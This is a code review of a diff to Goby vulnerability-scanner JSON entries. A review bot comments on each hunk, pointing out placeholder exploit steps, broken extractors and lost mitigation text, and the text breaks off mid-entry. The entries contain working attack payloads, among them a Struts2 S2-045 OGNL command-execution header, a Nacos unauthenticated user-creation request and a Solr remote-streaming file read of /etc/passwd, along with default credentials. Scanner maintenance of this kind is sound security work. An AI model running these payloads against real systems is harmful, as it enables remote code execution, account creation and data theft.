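Review bot: The added `ExploitSteps` block is a template rather than a step for this vulnerability: it requests `/test.php` and passes whenever the status is 200 and the body contains `test`, so together with `"HasExp": true` in the first hunk the scanner would report a successful exploit against any host that serves such a page. Either fill in the real step or keep `"HasExp": false` and omit `ExploitSteps` until one exists. The same hunk replaces the recorded `PostTime` and `GobyVersion` with the placeholders `0000-00-00 00:00:00` and `0.0.0`, and the first hunk blanks `Author` and empties `References`, so the provenance of the check is lost; keeping the original values (or a real reference) would preserve it. `"Recommendation": "update"` is not actionable either — name the fixed version or the vendor advisory. json/360_Tianqing_database_information_disclosure.json receives the identical template and placeholder values.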
@@ -1,19 +1,23 @@ { - "Name": "360 Tianqing database information disclosure", + "Name": "360 TianQing database information disclosure", "Level": "0", "Tags": [ "Disclosure of Sensitive Information" ], "GobyQuery": "app=\"360-TianQing\"", - "Description": "Tianqing has unauthorized unauthorized unauthorized access, resulting in the disclosure of sensitive information", - "Product": "360 Tianqing", - "Homepage": "https://www.360.cn/", - "Author": "PeiQi", - "Impact": "", - "Recommandation": "

undefined

", - "References": [ - "http://wiki.peiqi.tech" - ], + "Description": "", + "Product": "360 TianQing", + "Homepage": "https://360.net/product-center/Endpoint-Security/management-system", + "Author": "", + "Impact": "Tianqing has unauthorized unauthorized unauthorized access, resulting in the disclosure of sensitive information.", + "Recommendation": "update", + "References": [], + "HasExp": true, + "ExpParams": null, + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -21,7 +25,7 @@ "method": "GET", "uri": "/api/dbstat/gettablessize", "follow_redirect": false, - "header": {}, + "header": null, "data_type": "text", "data": "" }, @@ -62,6 +66,43 @@ "SetVariable": [] } ], - "PostTime": "2021-04-08 16:04:28", - "GobyVersion": "1.8.255" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Active_UC_index.action_RCE.json b/json/Active_UC_index.action_RCE.json index 496366f..5e85e6a 100644 --- a/json/Active_UC_index.action_RCE.json +++ b/json/Active_UC_index.action_RCE.json 
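Review bot: The added `ExploitSteps` is a `/test.php` placeholder with no connection to the unauthenticated `/api/dbstat/gettablessize` endpoint the scan step checks, yet `HasExp` is now `true`. Since the scan request already is the full disclosure, the exploit step can simply repeat it and capture the body — the Kylin config entry in this same patch does exactly that — e.g. `"uri": "/api/dbstat/gettablessize"` with `"SetVariable": ["output|lastbody"]`; otherwise set `"HasExp": false`. The `Impact` string also carries over the garbled phrase `unauthorized unauthorized unauthorized access`, and a `Recommendation` of `update` says nothing about which version closes the hole.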
@@ -1,28 +1,29 @@ { - "Name": "Active UC index.action 远程命令执行漏洞", + "Name": "Active UC index.action RCE", "Level": "3", "Tags": [ "RCE" ], "GobyQuery": "title=\"网动统一通信平台(Active UC)\"", - "Description": "网动统一通信平台 Active UC index.action 存在S2-045远程命令执行漏洞, 通过漏洞可以执行任意命令", - "Product": "网动统一通信平台(Active UC)", - "Homepage": "https://gobies.org/", - "Author": "luckying", - "Impact": "", - "Recommandation": "", - "References": [ - "https://gobies.org/" + "Description": "", + "Product": "Active UC", + "Homepage": "http://www.iactive.com.cn/", + "Author": "", + "Impact": "Active UC index.action has a RCE vulnerability.", + "Recommendation": "update", + "References": [], + "HasExp": true, + "ExpParams": [ + { + "Name": "cmd", + "Type": "input", + "Value": "whoami" + } ], - "HasExp": true, - "ExpParams": [ - { - "name": "Cmd", - "type": "input", - "value": "whoami", - "show": "" - } - ], + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -41,7 +42,7 @@ "Pragma": "no-cache" }, "data_type": "text", - "data": "-----------------------------18012721719170\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\nContent-Type: text/plain\n-----------------------------18012721719170" + "data": "-----------------------------18012721719170\r\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\r\nContent-Type: text/plain\r\n-----------------------------18012721719170" }, "ResponseTest": { "type": "group", @@ -59,7 +60,7 @@ "SetVariable": [] } ], - "ExploitSteps": [ + "ExploitSteps": [ "AND", { "Request": { 
@@ -72,12 +73,12 @@ "Connection": "close", "Cookie": "SessionId=96F3F15432E0660E0654B1CE240C4C36", "Charsert": "UTF-8", - "Content-Type": "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{{{Cmd}}}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}; boundary=---------------------------18012721719170", + "Content-Type": "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{{{cmd}}}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}; boundary=---------------------------18012721719170", "Cache-Control": "no-cache", "Pragma": "no-cache" }, "data_type": "text", - "data": 
"-----------------------------18012721719170\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\nContent-Type: text/plain\n-----------------------------18012721719170" + "data": "-----------------------------18012721719170\r\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\r\nContent-Type: text/plain\r\n-----------------------------18012721719170" }, "ResponseTest": { "type": "group", @@ -93,10 +94,10 @@ ] }, "SetVariable": [ - "output|lastbody" - ] + "output|lastbody|undefined|undefined" + ] } ], - "PostTime": "2021-06-28 10:08:54", - "GobyVersion": "1.8.268" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Alibaba_Nacos_Add_user_not_authorized.json b/json/Alibaba_Nacos_Add_user_not_authorized.json index e9a08ef..c5933e8 100644 --- a/json/Alibaba_Nacos_Add_user_not_authorized.json +++ b/json/Alibaba_Nacos_Add_user_not_authorized.json @@ -2,39 +2,38 @@ "Name": "Alibaba Nacos Add user not authorized", "Level": "2", "Tags": [ - "Ultra vires" + "unauthorized" ], - "GobyQuery": "title==\"Nacos\"", - "Description": "On December 29, 2020, the Nacos official disclosed in the issue released by GitHub that there is an unauthorized access vulnerability in Alibaba Nacos due to improper handling of user agent. Through this vulnerability, the attacker can perform arbitrary operations, including creating a new user and performing post login operations.", + "GobyQuery": "title=\"Nacos\"", + "Description": "Alibaba Nacos is an easy-to-use platform designed for dynamic service discovery and configuration and service management. It helps you to build cloud native applications and microservices platform easily.", "Product": "Alibaba Nacos", "Homepage": "https://github.com/alibaba/nacos", - "Author": "PeiQi", - "Impact": "
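Review bot: The exploit step's extractor was changed from `output|lastbody` to `output|lastbody|undefined|undefined`; every other extractor in this patch uses the `name|source|method|pattern` form (for example `output|lastbody|regex|(?s)"stream":"(.*)"}]` in the Solr entry), so the literal `undefined` looks like a JavaScript value leaked by whatever regenerated these files rather than a valid method, and the command output will probably not be captured. Restore `"output|lastbody"` unless Goby documents `undefined` as a no-op. The fixed `Cookie: SessionId=96F3F15432E0660E0654B1CE240C4C36` header is sent on every exploit request and makes the traffic trivially signaturable; it does not appear to be needed for S2-045, where the payload rides in `Content-Type`. The `\r\n` multipart line endings are a correct fix. The enclosing JSON object continues outside the hunk.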

Through this vulnerability, the attacker can perform arbitrary operations, including creating a new user and performing post login operations.

", - "Recommandation": "

Upgrade version

", - "References": [ - "http://wiki.peiqi.tech" - ], + "Author": "", + "Impact": "On December 29, 2020, the Nacos official disclosed in the issue released by GitHub that there is an unauthorized access vulnerability in Alibaba Nacos due to improper handling of user agent. Through this vulnerability, the attacker can perform arbitrary operations, including creating a new user and performing post login operations.", + "Recommendation": "update", + "References": [], "HasExp": true, - "ExpParams": [ - { - "name": "User", - "type": "input", - "value": "PeiQi", - "show": "" - }, - { - "name": "Pass", - "type": "input", - "value": "PeiQi", - "show": "" - }, - { - "name": "Dir", - "type": "select", - "value": "/v1/auth/users,/nacos/v1/auth/users", - "show": "" - } - ], + "ExpParams": [ + { + "Name": "User", + "Type": "input", + "Value": "test" + }, + { + "Name": "Pass", + "Type": "input", + "Value": "test" + }, + { + "Name": "Dir", + "Type": "select", + "Value": "/v1/auth/users,/nacos/v1/auth/users" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "OR", { @@ -90,7 +89,7 @@ "SetVariable": [] } ], - "ExploitSteps": [ + "ExploitSteps": [ "AND", { "Request": { @@ -103,7 +102,7 @@ "data_type": "text", "data": "username={{{User}}}&password={{{Pass}}}" }, - "ResponseTest": { + "ResponseTest": { "type": "group", "operation": "AND", "checks": [ @@ -117,10 +116,10 @@ ] }, "SetVariable": [ - "output|lastbody" - ] + "output|lastbody|undefined|undefined" + ] } ], - "PostTime": "2021-04-04 19:56:49", - "GobyVersion": "1.8.255" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Alibaba_Nacos_Default_password.json b/json/Alibaba_Nacos_Default_password.json index 9f09c58..dda72a9 100644 --- a/json/Alibaba_Nacos_Default_password.json +++ b/json/Alibaba_Nacos_Default_password.json 
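Review bot: The exploit step POSTs `username={{{User}}}&password={{{Pass}}}` and the defaults are now `test`/`test`, so a successful run leaves a persistent account with a trivially guessable password on the target, and nothing in the entry warns the operator or describes cleanup. `ExpTips.Content` is empty; fill it with something like `Creates a persistent Nacos user - delete it via the users API after verification`, and prefer a random or operator-supplied password over `test`. The extractor also became `output|lastbody|undefined|undefined`, which does not match the `name|source|method|pattern` form used elsewhere in the patch and probably drops the response; `output|lastbody` was the working value. The `Impact` text attributes the bypass to User-Agent handling, but the request headers are outside this hunk, so I could not confirm the spoofed agent is still sent.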
@@ -1,19 +1,23 @@ { - "Name": "Alibaba Nacos Default password", + "Name": "Alibaba Nacos Default Password", "Level": "1", "Tags": [ - "Default password" + "Default Password" ], - "GobyQuery": "title==\"Nacos\"", - "Description": "There is a default weak password Nacos/Nacos in the Alibaba Nacos console. You can log in to the background to view sensitive information (nacos/naocs)", + "GobyQuery": "title=\"Nacos\"", + "Description": "Alibaba Nacos is an easy-to-use platform designed for dynamic service discovery and configuration and service management. It helps you to build cloud native applications and microservices platform easily.", "Product": "Alibaba Nacos", "Homepage": "https://github.com/alibaba/nacos", - "Author": "PeiQi", - "Impact": "

Log in to the background to view sensitive information

", - "Recommandation": "

Upgrade version

", - "References": [ - "http://wiki.peiqi.tech" - ], + "Author": "", + "Impact": "There is a default weak password Nacos/Nacos in the Alibaba Nacos console. You can login to the background to view sensitive information (nacos/naocs).", + "Recommendation": "", + "References": [], + "HasExp": true, + "ExpParams": null, + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "OR", { @@ -71,6 +75,43 @@ "SetVariable": [] } ], - "PostTime": "2021-04-04 18:56:41", - "GobyVersion": "1.8.255" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Apache_Airflow_Unauthorized.json b/json/Apache_Airflow_Unauthorized.json index 1cc21ae..23d8bc4 100644 --- a/json/Apache_Airflow_Unauthorized.json +++ b/json/Apache_Airflow_Unauthorized.json @@ -1,18 +1,18 @@ { "Name": "Apache Airflow Unauthorized", - "Level": "3", + "Level": "2", "Tags": [ "Unauthorized" ], "GobyQuery": "app=\"APACHE-Airflow\"", - "Description": "remote attacker to gain unauthorized access to a targeted system", + "Description": "Airflow is a platform created by the community to programmatically author, schedule and monitor workflows.", "Product": "APACHE-Airflow", "Homepage": "https://airflow.apache.org/", - "Author": "aetkrad", - "Impact": "
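Review bot: `HasExp` is set to `true` in the first hunk, but the `ExploitSteps` added in the last hunk is a `/test.php` placeholder that never submits `nacos/nacos` to the login endpoint, so the entry advertises an exploit it does not have. Either set `"HasExp": false` or turn the stub into the actual login request (the scan step, outside this view, presumably already performs it and could be reused with `output|lastbody`). `Recommendation` is now an empty string; state the fix, e.g. `Change the default nacos/nacos credentials and restrict console access`.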

This allowed unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs

", - "Recommendation": "", + "Author": "", + "Impact": "Acunetix determined that it was possible to access Airflow Web interface without authentication. Airflow is designed to be accessed by trusted clients inside trusted environments. It's not recommended to have it publicly accessible.", + "Recommendation": "Restrict public access and upgrade to the latest version of Airflow.", "References": [], - "HasExp": false, + "HasExp": true, "ExpParams": null, "ExpTips": { "Type": "", @@ -62,6 +62,43 @@ ] } ], - "PostTime": "2021-10-31 15:32:53", - "GobyVersion": "1.8.302" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Apache_Kylin_Console_Default_password.json b/json/Apache_Kylin_Console_Default_password.json index 42863fd..0dec676 100644 --- a/json/Apache_Kylin_Console_Default_password.json +++ b/json/Apache_Kylin_Console_Default_password.json 
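Review bot: `HasExp` flips from `false` to `true` while the `ExploitSteps` added in the second hunk is a `/test.php` stub that checks for the word `test`, so the entry now claims an exploit it does not have; keep `"HasExp": false` until a real step exists. At the same time `Level` drops from `3` to `2` and the removed `Impact` wording — that unauthenticated users can add or modify Airflow variables used in DAGs, i.e. influence what scheduled jobs execute — is replaced by text lifted from an Acunetix advisory, so nothing in the diff justifies the downgrade. Suggest `"Impact": "Unauthenticated users can reach the Airflow web UI and add or modify Airflow variables used in DAGs."` and keeping the original level unless a reason is recorded in the entry.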
@@ -1,19 +1,23 @@ { - "Name": "Apache Kylin Console Default password", + "Name": "Apache Kylin Console default password", "Level": "1", "Tags": [ "Default password" ], "GobyQuery": "app=\"APACHE-kylin\"", - "Description": "Apache kylin console has a default weak password of admin/KYLIN, which can be further exploited by login console", + "Description": "Apache Kylin™ is an open source, distributed Analytical Data Warehouse for Big Data; it was designed to provide OLAP (Online Analytical Processing) capability in the big data era. By renovating the multi-dimensional cube and precalculation technology on Hadoop and Spark, Kylin is able to achieve near constant query speed regardless of the ever-growing data volume. Reducing query latency from minutes to sub-second, Kylin brings online analytics back to big data.", "Product": "Apache Kylin", "Homepage": "http://kylin.apache.org/", - "Author": "PeiQi", - "Impact": "

The attacker will log into the background as an administrator to further attack

", - "Recommandation": "

undefined

", - "References": [ - "http://wiki.peiqi.tech" - ], + "Author": "", + "Impact": "Apache kylin console has a default weak password of admin/KYLIN, which can be further exploited by login console.", + "Recommendation": "", + "References": [], + "HasExp": true, + "ExpParams": null, + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -51,6 +55,43 @@ "SetVariable": [] } ], - "PostTime": "2021-04-04 15:51:21", - "GobyVersion": "1.8.255" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Apache_Kylin_Unauthorized_configuration_disclosure.json b/json/Apache_Kylin_Unauthorized_configuration_disclosure.json index 17526a7..452be2f 100644 --- a/json/Apache_Kylin_Unauthorized_configuration_disclosure.json +++ b/json/Apache_Kylin_Unauthorized_configuration_disclosure.json 
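Review bot: `HasExp` is `true` but the added `ExploitSteps` is the `/test.php` stub and never sends `admin/KYLIN` anywhere, so either set `"HasExp": false` or make the step the real console login. `Recommendation` went from the placeholder `undefined` to an empty string — both are useless; `Change the default admin/KYLIN credentials and restrict console access` would do. `Description` now holds marketing copy from the Kylin site while the finding moved to `Impact`; that is consistent across the patch, but a scanner user reading `Description` first will no longer see what was found.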
@@ -1,28 +1,31 @@ { - "Name": "Apache Kylin Unauthorized configuration disclosure (CVE-2020-13937)", - "Level": "0", + "Name": "Apache Kylin API Unauthorized Access CVE-2020-13937", + "Level": "1", "Tags": [ - "Disclosure of Sensitive Information" + "unauthorized" ], "GobyQuery": "app=\"APACHE-kylin\"", - "Description": "Apache kylin has a restful API that exposes configuration information without authorization.\nAttackers can use this vulnerability to obtain sensitive information of the system.", + "Description": "Apache Kylin™ is an open source, distributed Analytical Data Warehouse for Big Data; it was designed to provide OLAP (Online Analytical Processing) capability in the big data era. By renovating the multi-dimensional cube and precalculation technology on Hadoop and Spark, Kylin is able to achieve near constant query speed regardless of the ever-growing data volume. Reducing query latency from minutes to sub-second, Kylin brings online analytics back to big data.", "Product": "Apache kylin", "Homepage": "http://kylin.apache.org/", - "Author": "PeiQi", - "Impact": "

Attackers can use this vulnerability to obtain sensitive information of the system.

", - "Recommandation": "

Upgrade to the safe version, or perform the following mitigation measures:

Edit \"$kylin\"_ HOME/WEB-INF/classes/ kylinSecurity.xml \";

Delete the following line \"< scr:intercept-url pattern= \"/api/admin/config\" access=\"permitAll\"/>\";

Restart the kylin instance to take effect.

", + "Author": "", + "Impact": "Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed Kylin's configuration information without any authentication, so it is dangerous because some confidential information entries will be disclosed to everyone.", + "Recommendation": "update", "References": [ - "http://wiki.peiqi.tech" + "https://nvd.nist.gov/vuln/detail/CVE-2020-13937" ], - "HasExp": true, - "ExpParams": [ - { - "name": "Config", - "type": "select", - "value": "/kylin/api/admin/config", - "show": "" - } - ], + "HasExp": true, + "ExpParams": [ + { + "Name": "Config", + "Type": "select", + "Value": "/kylin/api/admin/config" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -30,7 +33,7 @@ "method": "GET", "uri": "/kylin/api/admin/config", "follow_redirect": true, - "header": {}, + "header": null, "data_type": "text", "data": "" }, @@ -57,18 +60,18 @@ "SetVariable": [] } ], - "ExploitSteps": [ + "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/kylin/api/admin/config", "follow_redirect": true, - "header": {}, + "header": null, "data_type": "text", "data": "" }, - "ResponseTest": { + "ResponseTest": { "type": "group", "operation": "AND", "checks": [ @@ -89,10 +92,10 @@ ] }, "SetVariable": [ - "output|lastbody" - ] + "output|lastbody|undefined|undefined" + ] } ], - "PostTime": "2021-04-04 15:55:28", - "GobyVersion": "1.8.255" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Apache_Solr_Arbitrary_File_Read.json b/json/Apache_Solr_Arbitrary_File_Read.json index e31407f..50f128e 100644 --- a/json/Apache_Solr_Arbitrary_File_Read.json +++ b/json/Apache_Solr_Arbitrary_File_Read.json 
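Review bot: The removed `Recommandation` text carried the actual mitigation for CVE-2020-13937 — edit `$KYLIN_HOME/WEB-INF/classes/kylinSecurity.xml`, delete the `<scr:intercept-url pattern="/api/admin/config" access="permitAll"/>` line and restart — and it is replaced by the single word `update`, which loses the one thing an operator who cannot upgrade immediately needs. Restore it, e.g. `"Recommendation": "Upgrade past the affected versions listed in Impact, or remove the permitAll intercept-url for /api/admin/config from kylinSecurity.xml and restart Kylin."`. The exploit extractor also changed from `output|lastbody` to `output|lastbody|undefined|undefined`, which does not fit the `name|source|method|pattern` form used elsewhere and likely stops the config dump from being captured. Raising `Level` to `1` for a config leak that can expose credentials is reasonable, but replacing the sensitive-information tag with `unauthorized` drops the disclosure classification — consider keeping both.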
@@ -1,155 +1,155 @@ -{ - "Name": "Apache Solr Arbitrary File Read", - "Level": "2", - "Tags": ["fileread"], - "GobyQuery": "app=\"Solr\"", - "Description": "Apache Solr has an arbitrary file read vulnerability, which allows attackers to obtain sensitive files from the target server without authorization.", - "Product": "Apache Solr", - "Homepage": "https://solr.apache.org/", - "Author": "PeiQi", - "Impact": "

Read any file on the server

", - "Recommandation": "

undefined

", - "References": [ - "http://wiki.peiqi.tech" - ], - "HasExp": true, - "ExpParams": [ - { - "name": "file", - "type": "createSelect", - "value": "/etc/passwd,\\\\127.0.0.1\\c$\\Windows\\win.ini", - "show": "" - } - ], - "ExpTips": { - "Type": "", - "Content": "" - }, - "ScanSteps": [ - "AND", - { - "Request": { - "method": "GET", - "uri": "/solr/admin/cores?indexInfo=false&wt=json", - "follow_redirect": true, - "header": {}, - "data_type": "text", - "data": "" - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "responseHeader", - "bz": "" - } - ] - }, - "SetVariable": [] - } - ], - "ExploitSteps": [ - "AND", - { - "Request": { - "method": "GET", - "uri": "/solr/admin/cores?indexInfo=false&wt=json", - "follow_redirect": false, - "header": {}, - "data_type": "text", - "data": "" - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "responseHeader", - "bz": "" - } - ] - }, - "SetVariable": [ - "output|lastbody|regex|(?s)\"name\":\"(.*?)\"," - ] - }, - { - "Request": { - "method": "POST", - "set_variable":["solrCore|lastbody|regex|(?s)\"name\":\"(.*?)\","], - "uri": "/solr/{{{solrCore}}}/config", - "follow_redirect": false, - "header": { - "Content-Type": "application/json" - }, - "data_type": "text", - "data": "{\"set-property\" : {\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}" - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - } - ] - }, - "SetVariable": [] - }, - { - "Request": { - "method": "POST", - 
"uri": "/solr/{{{solrCore}}}/debug/dump?param=ContentStreams", - "follow_redirect": false, - "header": { - "Content-Type": "application/x-www-form-urlencoded" - }, - "data_type": "text", - "data": "stream.url=file://{{{file}}}" - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - } - ] - }, - "SetVariable": [ - "output|lastbody|regex|(?s)\"stream\":\"(.*)\"}]" - ] - } - ], - "PostTime": "2021-03-27 17:17:15", - "GobyVersion": "1.8.254" +{ + "Name": "Apache Solr Arbitrary File Read", + "Level": "2", + "Tags": ["fileread"], + "GobyQuery": "app=\"Solr\"", + "Description": "Apache Solr has an arbitrary file read vulnerability, which allows attackers to obtain sensitive files from the target server without authorization.", + "Product": "Apache Solr", + "Homepage": "https://solr.apache.org/", + "Author": "PeiQi", + "Impact": "

Read any file on the server

", + "Recommandation": "

undefined

", + "References": [ + "http://wiki.peiqi.tech" + ], + "HasExp": true, + "ExpParams": [ + { + "name": "file", + "type": "createSelect", + "value": "/etc/passwd,\\\\127.0.0.1\\c$\\Windows\\win.ini", + "show": "" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, + "ScanSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/solr/admin/cores?indexInfo=false&wt=json", + "follow_redirect": true, + "header": {}, + "data_type": "text", + "data": "" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "responseHeader", + "bz": "" + } + ] + }, + "SetVariable": [] + } + ], + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/solr/admin/cores?indexInfo=false&wt=json", + "follow_redirect": false, + "header": {}, + "data_type": "text", + "data": "" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "responseHeader", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|(?s)\"name\":\"(.*?)\"," + ] + }, + { + "Request": { + "method": "POST", + "set_variable":["solrCore|lastbody|regex|(?s)\"name\":\"(.*?)\","], + "uri": "/solr/{{{solrCore}}}/config", + "follow_redirect": false, + "header": { + "Content-Type": "application/json" + }, + "data_type": "text", + "data": "{\"set-property\" : {\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + 
"uri": "/solr/{{{solrCore}}}/debug/dump?param=ContentStreams", + "follow_redirect": false, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "stream.url=file://{{{file}}}" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|(?s)\"stream\":\"(.*)\"}]" + ] + } + ], + "PostTime": "2021-03-27 17:17:15", + "GobyVersion": "1.8.254" } \ No newline at end of file diff --git a/json/Aspcms_Backend_Leak.json b/json/Aspcms_Backend_Leak.json index 33d3b2c..9a05735 100644 --- a/json/Aspcms_Backend_Leak.json +++ b/json/Aspcms_Backend_Leak.json @@ -5,11 +5,11 @@ "infoleak" ], "GobyQuery": "app=\"ASPCMS\"", - "Description": "aspcms /plug/oem/AspCms_OEMFun.asp leak backend url", + "Description": "aspCMS is a module based ASP Content Management System (CMS).", "Product": "ASPCMS", - "Homepage": "https://gobies.org/", - "Author": "aetkrad", - "Impact": "

leak backend url

", + "Homepage": "", + "Author": "", + "Impact": "aspcms /plug/oem/AspCms_OEMFun.asp leak backend url.", "Recommendation": "", "References": [], "HasExp": true, @@ -126,6 +126,6 @@ ] } ], - "PostTime": "2021-11-02 20:50:45", - "GobyVersion": "1.8.302" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Atlassian_Confluence_OGNL_injection_CVE_2021_26084.json b/json/Atlassian_Confluence_OGNL_injection_CVE_2021_26084.json index 91bc4a9..0976c3a 100644 --- a/json/Atlassian_Confluence_OGNL_injection_CVE_2021_26084.json +++ b/json/Atlassian_Confluence_OGNL_injection_CVE_2021_26084.json @@ -1,25 +1,32 @@ { - "Name": "Atlassian Confluence OGNL injection CVE-2021-26084", + "Name": "Atlassian Confluence OGNL Injection CVE-2021-26084", "Level": "3", "Tags": [ - "rce" + "sqli" ], - "GobyQuery": "app=\"Confluence\"", - "Description": "Confluence is Atlassian's professional enterprise knowledge management and collaboration software, which can also be used to build enterprise wikis. Therefore, Confluence is widely used. In some cases, unauthorized attackers can construct special requests that cause remote code execution.", + "GobyQuery": "app=\"Confluence\" || product=\"Confluence\" || 